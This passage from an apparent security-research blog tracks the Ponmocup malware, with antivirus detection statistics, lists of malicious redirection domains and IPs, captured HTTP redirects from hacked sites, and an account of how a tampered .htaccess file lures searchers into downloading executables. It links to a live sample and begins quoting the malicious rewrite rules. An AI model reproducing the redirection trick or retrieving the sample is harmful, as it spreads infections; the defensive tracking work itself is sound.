style="font-family: "Courier New",Courier,monospace;"> 65 SUPERAntiSpyware</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 55 F-Prot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 55 Commtouch</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 52 Rising</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 46 eSafe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 34 eTrust-Vet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 34 ViRobot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 27 ClamAV</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 12 ByteHero</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 Prevx</span></span><br />
<br />
Here the top 25 of detections with the same name:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;"> <span style="background-color: yellow;">136 Microsoft = TrojanDownloader:Win32/Ponmocup.A</span><br /> <span style="background-color: yellow;">106 Ikarus = Trojan.Win32.Pirminay</span><br /> <span style="background-color: cyan;"> 96 VIPRE = Trojan.Win32.Generic!BT</span><br /> <span style="background-color: yellow;"> 86 Emsisoft = Trojan.Win32.Pirminay!IK</span><br /> <span style="background-color: cyan;"> 76 Comodo = TrojWare.Win32.Trojan.Agent.Gen</span><br /> <span style="background-color: yellow;"> 76 Antiy-AVL = Trojan/Win32.Pirminay.gen</span><br /> 74 Norman = W32/Obfuscated.L<br /> 70 Panda = Trj/CI.A<br /> 67 K7AntiVirus = Riskware<br /> 63 K7AntiVirus = Trojan<br /> 57 PCTools = Trojan.Gen<br /> 56 Sophos = Mal/Generic-L<br /> 52 Symantec = Trojan.Gen<br /> 34 Avast = Win32:Malware-gen<br /> 34 AhnLab-V3 = Trojan/Win32.Pirminay<br /> 32 Sophos = Mal/Ponmocup-A<br /> 32 NOD32 = Win32/TrojanDownloader.Agent.PXO<br /> 32 Comodo = UnclassifiedMalware<br /> 31 NOD32 = Win32/Qhost.NRX<br /> 31 DrWeb = Trojan.Hosts.303<br /> 30 eTrust-Vet = Win32/Swisyn.R<br /> 30 VirusBuster = Trojan.Swisyn!whPY1JLc4mw<br /> 30 ViRobot = Trojan.Win32.Swisyn.65024<br /> 30 VIPRE = Trojan.Win32.Swisyn.jyb (v)<br /> 30 TrendMicro-HouseCall = TROJ_FAM_00001e3.TOMA</span></div>
<br />
Some A/V use these common names (Ponmocup, Pirminay, Swisyn) but with numbering the variants. Here are the number of different variants per A/V:<br />
<br />
<span style="font-size: small;"><span style="font-family: "Courier New",Courier,monospace;"> 53 AhnLab-V3</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 40 AntiVir</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 3 Antiy-AVL</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 10 Avast</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8 Avast5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 56 CAT-QuickHeal</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 ClamAV</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 Commtouch</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;"> 1 Comodo</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 4 Emsisoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 F-Prot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 33 Fortinet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 4 Ikarus</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 57 Jiangmin</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: lime;">95 Kaspersky</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 McAfee</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 McAfee-GW-Edition</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 1 Microsoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 NOD32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 Panda</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 Sophos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 60 TheHacker</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 TrendMicro</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 TrendMicro-HouseCall</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 45 VBA32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;"> 2 VIPRE</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 ViRobot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 21 VirusBuster</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 eSafe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 eTrust-Vet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 58 nProtect</span></span><br />
<br />
Highlighted are some A/V with the most detections under <span style="background-color: yellow;">one well-known name</span>, some <span style="background-color: lime;">variants of a well-known name</span>, or some <span style="background-color: cyan;">generic name</span>.<br />
<br />
You can make of this statistic whatever you like.<br />
<br />
<br />
<div style="color: red;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-30:</span></div>
<br />
Here is a list of Ponmocup redirection domains & IPs from April and May 2012:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">2012-04-02 *.americancollegefootballleague.com 178.211.33.203<br />2012-04-02 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-03 *.albinopleco.com 178.211.33.203<br />2012-04-03 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-04 *.3d-tablet.cc 77.79.11.96<br />2012-04-05 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-05 *.nnan.co 178.211.33.203<br />2012-04-10 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-10 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-11 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-11 (fckery)*.getbetweenthecovers.com 178.211.33.203<br />2012-04-12 *.3d-tablet.cc 77.79.11.96<br />2012-04-12 (fckery)*.getbetweenthecovers.com 178.211.33.203<br />2012-04-16 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-19 *.learn2drive4free.com 178.211.33.203<br />2012-04-19 (ceprez)*.recycling-computers-portland.com 176.53.112.108<br />2012-04-24 *.pballgames.com 77.79.11.96<br />2012-04-24 *.thepetserver.com 77.79.11.96<br />2012-04-26 *.3d-tablet.cc 77.79.11.96<br />2012-04-27 *.albinopleco.com 178.211.33.203<br />2012-05-01 *.crisisice.com 77.79.11.96<br />2012-05-02 (beawnca)*.buildyourbankaccount.com 178.211.33.202<br />2012-05-03 *.arizonabettas.com 178.211.33.203<br />2012-05-03 *.arizonabettas.com 178.211.33.203<br />2012-05-03 *.akitahusky.net 77.79.11.96<br />2012-05-10 *.arizonabettas.com 178.211.33.203<br />2012-05-11 *.customshowerdoorandclosets.com 176.53.112.107<br />2012-05-11 (vrizasita)*.savegrady.com 178.211.33.203<br /><span style="color: blue;">2012-05-15 (fliboyshit)*.zk28wines.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-18 (belchar)*.psychicreadingstexas.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-18 (fliboyshit)*.zk28wines.com 178.211.33.205</span><br />2012-05-19 *.peachtreepropainters.biz 77.79.11.96<br />2012-05-22 *.customshowerdoorandclosets.com 176.53.112.107<br /><span style="color: blue;">2012-05-23 (elianis)*.funfitnessconcepts.com 178.211.33.205</span><br />2012-05-24 *.learn2drive4free.com 178.211.33.203<br />2012-05-25 *.soroki.info 176.53.112.108<br />2012-05-25 *.3d-tablet.cc 77.79.11.96<br /><span style="color: blue;">2012-05-25 (derhana)*.ottawaapplianceservice.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-29 (alqssas)*.kmpowersports.com 178.211.33.205</span></span><br />
<br />
Since <span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">2012-05-15</span></span> a new IP (<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">178.211.33.205</span></span>) has been used and several new domains.<br />
The "*" subdomain is in place of the source-port number (4 - 5 digits), but recently I've seen some random alpha-char subdomains (e.g. "<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">fliboyshit</span></span><span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">.zk28wines.com</span></span>") which I've noted as "<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">(random-alpha)*</span></span>".<br />
<br />
And here are some more infected servers: (malware-domain / infected-server-domain)<br />
<br />
Using "/cgi-bin/r.cgi" redirection pattern:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">herocopter.com www.drdracingheads.com<br />earlyanswered.com skyfield.eu<br />earlyanswered.com www.thorenberg.ch<br />costslaid.com www.comedy-hamburg.de<br />teethalong.org www.brautwelt.com</span></div>
<br />
Using "/url" redirection pattern:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">turboldd.greensforum.com www.tanz-tschui.ch<br />64890.customshowerdoorandclosets.com www.novoglas.ch<br />elianis.funfitnessconcepts.com shop.wiltec.info<br />62708.dancearkansas.com www.westcoastsports.ca<br />40172.learn2drive4free.com www.autocamp-nordsee.com<br />61136.3d-tablet.cc www.europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">54280.soroki.info citv.nl<br />derhana.ottawaapplianceservice.com www.zur-sonne.de<br />alqssas.kmpowersports.com www.real-art.ch</span><br />
<br />
The infection can still be verified with some online services like urlquery.net or Wepawet as this example shows: (for this type of infection urlvoid.com is ineffective!)<br />
<br />
<a href="http://www.urlvoid.com/scan/zur-sonne.de/">http://www.urlvoid.com/scan/zur-sonne.de/</a><br />
<span style="color: red;">Detections 0/32 (0.00%)</span><br />
<span style="color: red;">Status CLEAN</span> <b>-- is wrong!</b><br />
<br />
<a href="http://urlquery.net/report.php?id=61463">http://urlquery.net/report.php?id=61463</a><br />
<a href="http://urlquery.net/domainmap.php?id=61463">http://urlquery.net/domainmap.php?id=61463</a><br />
<br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">GET / HTTP/1.1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Host: www.zur-sonne.de</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Language: en-us,en;q=0.5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Encoding: gzip,deflate</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: 115</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: keep-alive</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Referer: http://www.google.ch/search?q=search</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">HTTP/1.1 302 Found</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Type: text/html; charset=iso-8859-1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Date: Wed, 30 May 2012 19:58:03 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Server: Apache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Set-Cookie: wXu=88; path=/; domain=www.zur-sonne.de; expires=Thu, 07-Jun-2012 06:43:03 GMT</span><br style="background-color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Location: http://derhana.ottawaapplianceservice.com/url?sa=D&source=web&cd=40&ved=0Y0njnzC0&url=http://www.zur-sonne.de/&ei=2ZIhfanJ4a20qo2MzFI19pu1pw==&usg=VtQuEf-ZH8RtWK5VeBWaYx&sig2=TcdEGbs2CczezFymxobGQs</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Length: 409</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: timeout=2, max=200</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: Keep-Alive</span></span><br />
<br />
<a href="http://www.urlvoid.com/scan/brautwelt.com/">http://www.urlvoid.com/scan/brautwelt.com/</a><br />
<span style="color: red;">Detections 0/32 (0.00%)</span><br />
<span style="color: red;">Status CLEAN</span> <b>-- is wrong!</b><br />
<br />
<a href="http://urlquery.net/report.php?id=61035">http://urlquery.net/report.php?id=61035</a><br />
<a href="http://urlquery.net/domainmap.php?id=61035">http://urlquery.net/domainmap.php?id=61035</a><br />
<br />
<a href="http://wepawet.cs.ucsb.edu/view.php?hash=7bd389d100b214c2c3d828a625a4d960&t=1338367510&type=js">http://wepawet.cs.ucsb.edu/view.php?hash=7bd389d100b214c2c3d828a625a4d960&t=1338367510&type=js</a><br />
<br />
So much for now, will update later :)<br />
<br />
<br />
<span style="font-style: italic; font-weight: bold;"><span style="color: red;">Updated 2012-05-31: new IP in new AS from Ukraine</span></span><br />
<br />
Since yesterday there seems to be a new domain and IP used for redirection.<br />
<br />
<div style="color: red; font-family: "Courier New",Courier,monospace;">
*.suncoastintegration.com / 91.207.4.51</div>
<br />
<a href="http://urlquery.net/report.php?id=61824">http://urlquery.net/report.php?id=61824</a><br />
<a href="http://urlquery.net/domainmap.php?id=61824">http://urlquery.net/domainmap.php?id=61824</a><br />
<br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">GET / HTTP/1.1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Host: www.haar-kosmetik-elke.at</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Language: en-us,en;q=0.5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Encoding: gzip,deflate</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: 115</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: keep-alive</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Referer: http://www.google.ch/search?q=haare elke</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">HTTP/1.1 302 Found</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Type: text/html; charset=iso-8859-1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Date: Thu, 31 May 2012 15:22:26 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Server: Apache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Set-Cookie: ycg=7; path=/; domain=www.haar-kosmetik-elke.at; expires=Thu, 07-Jun-2012 22:09:26 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Location: http://64818.suncoastintegration.com/url?sa=D&source=web&cd=35&ved=0Uwyx0bHq&url=http://www.haar-kosmetik-elke.at/&ei=2ZIve67N5qe9r42LzFUw9Ju1pA==&usg=qxAULtLuZCKhxlKx8jozeI&sig2=Xbx4cH8V3ygWhtyx7magT7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Length: 488</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: close</span></span><br />
<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-21629957493659714982012-03-08T12:17:00.012-08:002012-04-14T14:44:43.890-07:00Ponmocup, lots changed, but not all<span style="font-style: italic; font-weight: bold;">Updated on 2012-03-09 </span><span style="font-style: italic;">(see at the end <span style="color: rgb(255, 0, 0);">and list of domains below</span>)</span><br /><br /><strong><em>Updated on 2012-03-15</em> </strong><em><span style="color:#000099;">(list of domains below)</span></em><br /><br /><strong><em>Updated on 2012-04-14</em> </strong><em><span style="color:#000099;">(more info, links to IOC and ref's at end)</span></em><br /><br />So here goes another post about the Ponmocup malware. Lots of things changed recently, but not all (luckily for defenders).<br /><br />First, for those who are not yet familiar with the infection steps here a quick overview. A user searches for something using a web search engine, e.g. Google. He clicks on a link leading to an infected website. But the infection is not on certain pages as (obfuscated) scripts, but instead the ".htaccess" file was changed. It checks the referer and the user-agent of a visitor and if checks are OK it sends back a 302-redirect and sets a cookie. The intermediate redirection server sends back another 302-redirect to another server, which delivers the malware executable. It's an EXE or COM file with the search query terms as filename.<br /><br />Previously, the first redirection step was using a "/cgi-bin/r.cgi" pattern which was detected by this snort rule (<a href="http://doc.emergingthreats.net/bin/view/Main/2013312">2013181</a>). Here's an <a href="http://www9.dyndns-server.com:8080/pub/botnet/r-cgi_malware_analyse_2011-08-03.txt">example from 2011-08-03</a>.<br /><br />Just recently I discovered that this pattern changed <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">at least since 2012-01-24</a>. The first redirection now looks very much like that from a Google search result (/url?sa=...). Here's an example of the <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt">new infection pattern from 2012-03-07</a>. (<a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/google_query_words.zip">Sample</a> with pwd "infected")<br /><br />I submitted the sample to VT and some online analysis services. Here's a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_7096_ae89045e3448df19de679988e6e6600d.pdf">GFI Sandbox report</a> [PDF]. As you can <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-03-07_152144_ponmocup-GFI.png">see in this report</a>, lots of indicators are still the same (although some are randomized). The registry key mentioned in my previous post is still set. That's still one constant (and easy) indicator to detect an infection. The hosts file doesn't seem to be changed anymore.<br /><br />The C2 traffic after an infection changed a lot, too, so most<a href="http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup"> old snort rules</a> won't detect it anymore.<br />Here's some "OSINT research" I've done in late November last year.<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt</a><br /><br />For more details about previous research please see the <a href="http://www9.dyndns-server.com:8080/pub/botnet-links.html">main page</a> and excuse the bad formatting! (I just wanted to put that info <span style="font-style: italic;">somewhere fast & quick</span>)<br /><br />Now if you were just looking for some new network indicators, here's a list of <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">observed</a> malware redirect domains and IPs:<br /><br /><span style="font-family:courier new;">176.53.112.107</span><br /><span style="font-family:courier new;">176.53.112.108</span><br /><span style="font-family:courier new;">178.211.33.202</span><br /><span style="font-family:courier new;">178.211.33.203</span><br /><span style="font-family:courier new;">77.79.11.96</span><br /><br /><span style="font-family:courier new;">*.3d-tablet.cc</span><br /><span style="font-family:courier new;">*.aabathlift.com</span><br /><span style="font-family:courier new;">*.akitahusky.com</span><br /><span style="font-family:courier new;">*.akitahusky.net</span><br /><span style="font-family:courier new;">*.akitahusky.org</span><br /><span style="font-family:courier new;">*.albinopleco.com</span><br /><span style="font-family:courier new;">*.bapiescafe.com</span><br /><span style="font-family:courier new;">*.customshowerdoorsc.com</span><br /><span style="font-family:courier new;">*.dancearkansas.com</span><br /><span style="font-family:courier new;">*.ilyanet.info</span><br /><span style="font-family:courier new;">*.peachtreepropainters.biz</span><br /><span style="font-family:courier new;">*.peachtreepropainters.com</span><br /><span style="font-family:courier new;">*.peachtreepropainters.info</span><br /><span style="font-family:courier new;">*.peachtreepropainters.net</span><br /><span style="font-family:courier new;">*.puritanhardrive.com</span><br /><span style="font-family:courier new;">*.soroki.info</span><br /><span style="font-family:courier new;">*.thepetserver.com</span><br /><span style="font-family:courier new;">*.vicandbarbs.net</span><br /><br /><span style="color: rgb(255, 0, 0);">Thanks Kenneth (<a href="https://twitter.com/Patories">@Patories</a> / <a href="http://randomthoughtsofforensics.blogspot.com/">blog</a>) for adding to this list! (added 2012-03-09)</span><br /><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.biz</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.me</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.tv</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.appliancerecyclingportland.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.crisisice.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.entrygrid.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.iphone-yes.us</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.jennyswanepoel.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.kingoftheaquarium.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.learn2drive4free.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.nosilentnight.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.ns.themahoganylife.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.p-ballgames.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.pballgames.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.perfectgameproductions.biz</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.reefclown.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.suncoastintegration.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.thesubtleactivist.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.thomasyohannan.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.travel-yes.com</span><br /><br /><span style="font-family:courier new;">argumenthistorical.org</span><br /><span style="font-family:courier new;">besidesdream.com</span><br /><span style="font-family:courier new;">capitalinformer.com</span><br /><span style="font-family:courier new;">dmjxluffloundering.info</span><br /><span style="font-family:courier new;">dutytraditional.net</span><br /><span style="font-family:courier new;">dvmsoft.eu</span><br /><span style="font-family:courier new;">earlyanswered.com</span><br /><span style="font-family:courier new;">formedtouch.com</span><br /><span style="font-family:courier new;">gtracking.org</span><br /><span style="font-family:courier new;">interestingchapter.net</span><br /><span style="font-family:courier new;">jesusonlynet.org</span><br /><span style="font-family:courier new;">khyiftcrusher.info</span><br /><span style="font-family:courier new;">nbeegclassics.info</span><br /><span style="font-family:courier new;">oorvyvwdeciphers.info</span><br /><span style="font-family:courier new;">reportedtechniques.org</span><br /><span style="font-family:courier new;">sahnespender.com</span><br /><span style="font-family:courier new;">sqpgksbweathering.info</span><br /><span style="font-family:courier new;">szentkoronaradio.com</span><br /><span style="font-family:courier new;">teethalong.org</span><br /><span style="font-family:courier new;">travelmeant.net</span><br /><span style="font-family:courier new;">twiceseparate.com</span><br /><span style="font-family:courier new;">underbuild.net</span><br /><span style="font-family:courier new;">virtualmapping.org</span><br /><span style="font-family:courier new;">watchingsquare.com</span><br /><br /><span style="font-family:courier new;">*.bankingonbankers.com</span><br /><span style="font-family:courier new;">109.236.80.151</span><br /><p><span style="color:#000099;">added 2012-03-15:</span></p><p><span style="font-family:Courier New;color:#000099;">*.stephanized.info / 176.53.112.107</span></p><p><span style="font-family:Courier New;color:#000099;">*.b12capitalpartners.com / 109.236.80.187</span></p><br /><br />The previous lists of domains have not been updated with new ones (yet).<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html</a><br /><br />Now who will create some snort rules or IOCs out of this?<br /><br />Let's go ;-)<br /><br /><br /><span style="font-style: italic; font-weight: bold;">Updated on 2012-03-09:</span><span style="font-style: italic;"><br /></span><br />First let me clear somethig up. The infection does not exploit any vulnerability, except the "human" using social engineering. The user searching for some <span style="font-style: italic;">query terms</span> is lured to open the downloaded malware executable due to the <span style="font-style: italic;">query terms</span> in the file name. So fully patched Windows systems are vulnerable, if executable files can be downloaded from the Internet.<br /><br />The user does not need to have admin priviledges on the system to get infected. For non-admins "only" the current user running the malware executable gets infected.<br /><br />Now let's take another look at the first step of infection, the redirection URLs from the infected ".htaccess" file on a hacked webserver. I believe the .htaccess files are manipulated using stolen (FTP or other) logins to these webservers.<br /><br />I got hold of such a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/htaccess.txt">.htaccess file</a> and located the malicious "code". The 33 lines of code are <span style="font-style: italic;">well hidden</span> in the middle of the over 3,000 lines long file, which is <span style="font-style: italic;">really hard to find</span> ;-) (end of sarcasm)<br /><br /><span style="font-family:courier new;">$ wc -l htaccess.txt</span><br /><span style="font-family:courier new;">3094 htaccess.txt</span><br /><br /><span style="font-family:courier new;">$ egrep -n " " htaccess.txt wc -l</span><br /><span style="font-family:courier new;">33</span><br /><br /><span style="font-family:courier new;">$ egrep -n " " htaccess.txt</span><br /><span style="font-size:85%;"><span style="font-family:courier new;">1513:<ifmodule c=""></ifmodule></span><br style="font-family:courier new;"><span style="font-family:courier new;">1515:RewriteEngine On</span><br style="font-family:courier new;"><span style="font-family:courier new;">1517:RewriteCond 